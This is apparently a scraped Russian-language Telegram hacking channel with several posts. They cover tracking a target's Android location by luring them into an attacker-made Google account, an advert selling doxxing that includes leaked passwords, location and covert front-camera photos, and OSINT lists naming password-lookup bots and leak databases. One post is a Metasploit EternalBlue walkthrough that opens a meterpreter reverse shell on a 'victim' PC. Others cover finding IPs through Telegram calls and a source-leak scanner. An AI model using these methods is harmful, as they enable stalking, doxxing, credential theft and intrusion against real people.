Geek Hacker

2021-03-16 12:26:27 Отслеживаем местоположение Android-устройства

1. Создаём аккаунт Google и под любым предлогом заставляем обидчика зайти в него со своего устройства.

Предлог можно использовать такой: "Привет! Интересует услуги хакера? Могу взломать кого угодно. Почту твоего друга Ивана Ивановича (смотрим раздел друзей в ВК и т.д.) я уже взломал. Чтобы удостовериться во мне, можешь сам проверить его почту - (и кидаем данные от созданного аккаунта).

2. Если жертва зашла в аккаунт, вам нужно зайти с нового аккаунта сюда - https://www.google.com/android/find и найти его устройства. Там будет вся информация, включая геолокацию. Открыть/Комментировать

2021-03-09 22:24:46 ​​ Задеаноним кого хотите. Дадим подробную информацию об анониме

Вас кинули? Или угрожают с анонимных источников? И вы не можете найти и наказать? Мы к твоим услугам.

Сорвём маску с анонима и выведем на чистую воду

Денаноним в любых соц.сетях на любой платформе любую личность. Проведём полный OSINT любому объекту.

Что мы можем предоставить:

Номер телефона. На кого зарегистрирован номер. В каких соц.сетях/сервисах и т.д. Как записан у друзей в контактах и многое другое.
Электронную почту. Слитые пароли от эл.почты и где была использована почта.
Точное местоположение. Где находятся жертва, с точностью 30м.
Данные об устройстве. Данные об устройстве, который использует аноним.
Фотографию с фронтальной камеры. После получения фотографии с фронтальной камеры, анонима можно будет идентифицировать в БД и найти соц.сети, где было зафиксировано его лицо.
И многое другое...

По всем вопросам: @xxservice_bot
Наш чат: @xxservicechat Открыть/Комментировать

2021-03-04 14:00:13 ​​Материалы и ресурсы для OSINT ч.2

Повышение качества изображения:

LetsEnhance.io - Image enhancement powered by AI
Professional Face Analyser and Portrait Photo Retouching
Improve Photo - Enhance Picture & Photo Online in one magical click!
MyHeritage Photo Enhancer, verbeter uw familiefoto's met 's werelds beste deep learning-technologie - MyHeritage

Телеграм Боты:

@egrul_bot - информация о юр лицах и учредителях, ИП, адреса и взоимодействия между ними
@HowToFind_bot - приёмы и "секреты" ОСИНТ + обширная база полезных ботов
@mailsearchbot - выдаёт пароль по email
@buzzim_alerts_bot - проводит поиск по Телеграм
@AvinfoBot - по номеру смотрит объявления на авито
@getfb_bot - по номеру ищет аккаунт facebook
@EyeGodsBot - поиск по всем фронтам
@VKUserInfo_bot - информация о пользователе вк
@Dosie_Bot - поиск информации по ИНН
@Smart_SearchBot - поиск контактной информации

Чекеры валидности мыла:

Email Verification and List Cleaning Service
Mailvalidator
ZeroBounce - Email Validation Service And Deliverability Toolkit
Email Marker | Email Verification & Cleaning Services
https://2ip.ru/mail-checker/
http://ru.smart-ip.net/check-email/
https://quickemailverification.com/
https://ivit.pro/services/email-valid/

Whois:

https://2ip.ru/whois/
http://www.ripn.su/nic/whois/
https://whoer.net/ru/checkwhois
http://www.securrity.ru/whoiz.html

Google дорки:

https://codeby.net/threads/google-hacking-ili-nax-shoudan.59762/
https://codeby.net/threads/osvaivaem-google.61095/
https://codeby.net/search/16362/?q=Google+Dorks&o=date

Прочие ссылки на Codeby:

https://github.com/smicallef/spiderfoot/blob/master/README.md
https://github.com/netstalking-core/netstalking-osint/blob/master/README.md
https://codeby.net/threads/osint-na-platforme-telegram.68064/
https://codeby.net/threads/10-poleznyx-instrumentov-dlja-osint.66907/
https://codeby.net/threads/ispolzovanie-otkrytyx-dannyx-osint-v-chasti-geolokacii.76040/
https://codeby.net/resources/russkij-perevod-osint-cheat-sheet-shpargalka-osint-2019.931/
https://codeby.net/threads/osint-v-more-sposoby-sbora-informacii-o-morskix-gruzoperevozkax.74515/
https://codeby.net/threads/offensive-osint-chast-1-osint-rdp.73660/
https://codeby.net/threads/offensiv...-rasprostranenija-nelegalnogo-kontenta.73661/
https://codeby.net/threads/offensiv...s-vyborami-na-polskom-servise-wykop-pl.73674/
https://codeby.net/threads/offensiv...-infrastruktury-v-jugo-vostochnoj-azii.73675/
https://codeby.net/threads/offensiv...orativnyj-shpionazh-schupalca-mindgeek.73688/

Geek Hacker

#osint Открыть/Комментировать

2021-03-03 22:06:08 ​​Материалы и ресурсы для OSINT ч.1

Поисковики:

censys.io
shodan.io
viz.greynoise.io/table
zoomeye.org
fofa.so
onyphe.io
app.binaryedge.io
hunter.io
wigle.net
Lampire.io

Поиск информации о человеке из открытых источников:

pipl.com — поисковик по социальным сетям]
leakedsource.ru — поиск по базам данных
dumpedlqezarfife.onion — найдет письмо с паролем
Leakprobe.net — найдет адрес электронной почты и источник утечки базы данных
where-you.com — поисковик по социальным сетям(СНГ)
vk.city4me.com — шпион ВК
yasni.com — автоматический поиск в Интернете
social-searcher.com — все посты пользователя
socialmention.com — все упоминания о человеке
nomerorg.me — телефонная база СНГ (только крупные города)
namecheckup.com — проверка сайтов и приложений
Instantusername.com — проверка сайтов и приложений
suip.biz — osintframework онлайн
phonenumber.to — поиск по номеру телефона, адрессу, ФИО
spra.vkaru.net — телефонный справочник Россия, Украина, Беларусь, Казахстан, Латвия, Молдова

Поиск по номеру телефона:

Lampyre (Web) — веб версия поиска по любому номеру телефона, поиск по аккаунтам и телефонной книге
Getcontact (Getcontact - Call Identification & Spam Protection) — найдет информацию о том как записан номер в контактах
Microsoft (http://account.live.com/) — проверка привязанности номера к microsoft аккаунту
Avinfo.guru (https://avinfo.guru/) — проверка телефона владельца авто, иногда нужен VPN
Telefon.stop-list (Проверить телефон онлайн - найти по номеру телефона - поиск по телефону) — поиск по всем фронтам, иногда нет информации
Telefon (Проверить телефон онлайн - найти по номеру телефона - поиск по телефону) — Поиск по всем фронтам
@ FindNameVkbot ([Telegram – a new era of messaging](https://codeby.net/goto/link-confirmation?url=aHR0cHM6Ly90Lm1lL0BGaW5kTmFtZVZrX2JvdA%3D%3D)) — Бот ищет историю смены фамилий профиля по открытым источникам, указывает дату создания аккаунта.
_@InfoVkUser_bot (Telegram – a new era of messaging) — Бот позволяет провести анализ друзей профиля. Сейчас доступны ВУЗы и родные города.
@numberPhoneBot (Telegram – a new era of messaging) — найдет адрес и ФИО, не всегда находит
Truecaller (The world's best Caller ID & Spam Blocking app | Truecaller) — телефонная книга, найдет имя и оператора телефона
Bullshit (Поиск по объявлениям на Авите) — поиск объявлений по номеру телефона
Bases-brothers (https://bases-brothers.ru/) — поиск номера в объявлениях
Rosfirm (Адресный справочник городов России - Москва, Санкт-Петербург и другие регионы) — найдет ФИО, адрес прописки и дату рождения, нужно знать город
Spravnik (Телефонный справочник. Крупные города и не только...!) — поиск по городскому номеру телефона, найдет ФИО и адрес
@usersbox_bot (Telegram – a new era of messaging) — бот найдет аккаунты в ВК у которых в поле номера телефона указан искомый номер
Spiderfoot (SpiderFoot: OSINT Automation) — автоматический поиск с использованием огромного количества методов, ножно использовать в облаке если пройти регистрацию
Locatefamily (Locate Family | Find people for FREE!) — поиск адреса и ФИО
Nuga — поиск instagram
Live.com (http://account.live.com/) — Проверка привязки к майкрософт

Ресурсы для работы с метаданными:

online metadata and exif viewer
Image info online
http://exif.regex.info/exif.cgi
http://imgops.com/

Поиск и анализ объекта по изображению:

Соц. сети и сведения:

Findclone
search4faces.com - Найди профили человека в соцсетях по его фотографии. Аналог findface, аналог searchface.
PimEyes: Face Recognition Search Engine and Reverse Image Search
VK.watch – история профилей ВКонтакте

Определение возраста:

pictriev, face search engine
How old do I look?

Поисковые системы:

Яндекс.Картинки: поиск изображений в интернете, поиск по изображению
Поиск по картинкам - Поиск Mail.Ru
Google Images
TinEye Reverse Image Search
https://findclone.ru/
https://search4faces.com/

Geek Hacker

#osint Открыть/Комментировать

2021-03-01 18:27:35 ​​Как вычислить IP по почте?

В этом посте пойдет речь о способе вычисления IP по почте. У многих, наверное, была такая ситуация, что вам на почту приходило оповещение от достаточно популярных сервисов с просьбой о смене данных, либо осуществить повторную авторизацию.

Обычно, такие сообщения любят присылать злоумышленники, но не стоит волноваться, на помощь может прийти IP-адреса, с помощью него можно с легкостью найти самого отправителя.

Мошенники, скрывающиеся под маской добра, могут отправить на ваш почтовый адрес фишинговое письмо или вредоносный файл.

С помощью данного способа вы сможете определить местонахождения отправителя по таким данным, как: широта, долгота, высота над уровнем моря.

Инструкция:

Откройте письмо, которое считаете подозрительным и кликните по 3-м точкам.
Нажмите на пункт "Показать оригинал".
В открывшейся вкладке найдите строку Received: from
Там вы сразу увидите IP хоста отправителя.

Готово. Пользуйтесь!

Не забывайте включать уведомления на выход новых постов!

Geek Hacker

#IP Открыть/Комментировать

2021-02-25 17:23:43 ​​Взлом ПК через телефон

Взламывать мы будем мою виртуальную машину с Windows 7. Устройством взлома будет служить мой смартфон.

1. Запускаем metasploit командой:

msfconsole

2. Ждем, когда запустится программа и в ней прописываем:

use exploit/windows/smb/ms17_010_eternalblue

Этой командой мы выбираем эксплойт: eternalblue

3. Далее выбираем процесс, который мы будем внедрять в систему. Если у жертвы стоит 32-битная система, то прописываем команду:

set process inject wlms.exe
set process inject lsass.exe

4. Следующей командой мы выбираем, что будем управлять компьютером с помощью reverse_tcp

set payload windows/x64/meterpreter/reverse_tcp

5. Этой командой мы прописываем IP жертвы:

set rhost 192.168...

Если вы с "жертвой" находитесь в одной локальной сети, можете скачать на свой смартфон программу (например, Fing, zAnti или wifi kill, хотя предназначение последней немного другое), которая сканирует сеть и показывает MAC-адреса и IP всех устройств в локальной сети.

6. Этой командой прописываем свой IP (устройства с которого атакуете):

set lhost 192.168...

Узнать свой IP можно, если в Termux прописать команду: ifconfig

7. Прописываем команду:

exploit

И ждем. Как только запустится сессия meterpreter, всё - взлом прошел успешно.

8. Теперь, вы можете делать в компьютере "жертвы" все, что захотите. Ваши возможности ограничиваются лишь вашей фантазией.

Можно скопировать файлы "жертвы", удалить их, посмотреть конфигурацию компьютера и т.д. Пропишите команду help, чтобы посмотреть все доступные команды. Открыть/Комментировать

2021-02-18 08:11:00 ​​Автоматизированный поиск утечек

Sourceleahacker — это специальный инструмент для анализа на утечку информации целевого ресурса.

Установка и эксплуатация

Открываем терминал Kali linux и выполняем обновление пакетов:

apt-get update && apt-get upgrade

Устанавливаем все необходимые библиотеки для корректной работы:

apt-get install python3-coloredlogs python3-prettytable python3-contextlib2

Клонируем инструмент с репозитория GitHub:

git clone https://github.com/WangYihang/SourceLeakHacker.git

Далее переходим в папку инструмента:

cd SourceLeakHacker

Устанавливаем зависимости:

pip install -r requirments.txt

И запускаем процесс поиска утечек определенного ресурса:

python3 SourceLeakHacker.py --url=

378 views05:11

Открыть/Комментировать

2021-02-12 14:00:24 ​​Находим IP-адрес человека через Telegram-звонки: Способ 2

Месяца два назад я вам показал способ добычи IP через Telegram.
Как оказывается, умелые хакеры придумали ещё более лёгкий способ узнать IP-адрес того, кто ответил на Telegram-звонок.

Примечание: нужен Windows 10

Погнали:

1. Звоним жертве с десктоп-версии Telegram.
2. Запускаем диспетчер задач -> производительность -> сеть -> монитор ресурсов -> образ -> Telegram.exe 
3. Теперь смотрим, с каким IP-адресом больше всего обменивается трафика. Скорее всего это и есть айпишник жертвы.

Geek Hacker Открыть/Комментировать

2021-02-01 15:00:12 ​​Приватный обмен файлами с помощью Send

Недавно появился новый сервис по обмену файлами от разработчиков Firefox. Firefox Send позволяет делиться файлами со сквозным шифрованием и ограниченным сроком действия ссылки на загрузку.

Достаточно зайти на https://send.firefox.com и перетащить в специальное поле любой файл размером до одного гигабайта. Файл будет загружен на сервер компании и зашифрован, а вы получите на него ссылку, которой сможете поделиться с другим человеком.

Скачать файл можно будет только в течение суток с момента загрузки, после чего контент будет удален с сервера автоматически.

Geek Hacker

#приватность #анонимность Открыть/Комментировать